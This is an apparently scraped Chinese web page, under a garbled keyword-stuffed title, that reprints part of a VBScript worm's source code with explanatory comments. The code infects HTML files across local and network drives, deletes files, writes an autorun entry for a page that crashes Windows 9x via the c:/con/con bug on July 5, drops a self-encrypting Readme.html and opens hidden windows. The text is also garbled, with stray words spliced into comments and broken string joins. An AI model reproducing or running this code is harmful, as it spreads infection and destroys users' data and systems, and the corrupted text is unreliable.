c语言goout c语言goodsi·name( 二 )


Hackpage ' 执行感染网站程序
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then '遍历所有本地硬盘和网络共享硬盘
call SearchHTML(x"\") '执行文件感染程序
end if
next
if TestUser then '检查用户
Killhe 执行删除文件操作
else
if Month(Date)Day(Date) = "75" then '如系统时间为 7月5日
set vf = fso.OpenTextFile(w2"75.htm", 2,true) ’创建系统攻击文件
vf.write MakeScript ("window.navigate ('c:/con/con');", false)
vf.close
Writereg MSWKEY"CurrentVersion\Run\75", w2"75.htm", "" '自动启动
window.navigate "c:/con/con" '立刻蓝屏,利用 Windows BUG , 能引起 Win9X 系统100%死机(即无法恢复的蓝屏)
else '如不是7.5
if fso.FileExists(w2"75.htm") then fso.DeleteFile w2"75.htm" ' 删除75.htm
end if
end if
if fso.FileExists(defpath) then fso.DeleteFile defpath ' 删除 C:\Readme.html 病毒文件
end sub
sub ExecuteMail() '邮件状态时执行的程序
on error resume next
Vbs_Str = GetScriptCode("vbscript")
Js_Str = GetJavaScript()
Set Stl = CreateObject("Scriptlet.TypeLib") '创建 TypeLib对象
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write() '创建 C:\Readme.html 文件
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打开会隐藏的窗口
end sub
sub ExecuteVbs() ' 同理,如病毒文件是 VBS 时所执行的程序
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject("Scripting.FileSystemObject")
set wvbs = CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY"Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"
set vf = fso.OpenTextFile (w2"system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x"\")
end if
next
if TestUser then Killhe
end sub
sub Gf() '得到系统路径
w1=fso.GetSpecialFolder(0)"\"
w2=fso.GetSpecialFolder(1)"\"
end sub
function Readreg(key_str) '读注册表
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) '写注册表
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="""HTML""HEAD""TITLE"title(ra)"/""TITLE""/HEAD"_
"BO""AD"vbcrlfMakeScript(Sbuffer, iHTML)vbcrlf_
"""/BOAD""/HTML"
end Function
function MakeScript(Codestr, iHTML) '此程序是病毒进行自c语言goout我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write(''+""'SCRIPT Language=JavaScript\n'+"_
"jword""+'\n/'""+'SCRIPT');"
DocuWrite = DocuWritevbcrlf"document.write(''+""'SCRIPT Language=VBScript\n'+"_
"nword""+'\n/'""+'SCRIPT');"
MakeScript="""SCRIPT Language=JavaScript"vbcrlf"var jword = "_
chr(34)encrypt(Js_Str)chr(34)vbcrlf"var nword = "_
chr(34)Codestrchr(34)vbcrlf"nword = unescape(nword);"vbcrlf_
"jword = unescape(jword);"vbcrlfDocuWritevbcrlf"/""SCRIPT"
else
MakeScript= """SCRIPT Language=JavaScript"Codestr"/""SCRIPT"
end if
end function
function GetScriptCode(Languages) ' 得到不同脚本语言的代码
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then

推荐阅读